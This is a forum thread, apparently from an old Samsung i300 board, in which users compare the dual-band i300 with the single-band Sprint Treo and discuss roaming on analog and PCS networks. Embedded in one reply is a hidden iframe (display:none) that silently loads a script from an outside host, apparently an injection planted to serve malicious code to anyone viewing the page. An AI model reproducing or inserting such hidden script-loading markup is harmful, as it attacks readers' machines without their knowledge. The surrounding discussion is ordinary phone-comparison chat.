+ Reply to Thread

Smile Dual Band vs Single band

The I 300 has dual band and for me that is important. Does it make sense as a new user to get the Treo even if is is only single band. Does the I300 roam well? Thank You...Peter

Administrator

Arrow

the '300 will roam on analog 800 amps wherever there is a signal, so it will do just as good as any ohter phone capable of using that spectrum.

the treo is single band 1900 mhz pcs only so it will not roam at all. if you are a sprint customer and you are in areas where you will be roaming and you dont mind to roam, you will be up the creek (without a paddle) with a treo.

actually, it will roam...

The Treo does roam, but only on PCS CDMA carriers like Cricket, Northcoast, and, in Florida, Verizon. It would be rare that this would be useful, however, because Sprint has a larger digital footprint than any of these carriers. Analog back up is great out in the boonies but if you stick to cities, larger towns and major highways, analog isn't needed.
    Bruce Sneddon

If you NEVER go cross country or between big cities or anywhere out of Sprints area then you are okay. The likelyhood of you getting digital roam is not too good.

If you ever drive between cities and out in the "boonies" then the dual bander is a necessity. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Let he who is without sin cast the first stone.

OUCH!!!

Napoleon Bonaparte Jr.

hello

Hello ppl !

You have to realize , what this forum for Samsung I-300 only !

You wanna Treo ,- go to : http://www.treocentral.com

Tell me , if I am wrong MJ ...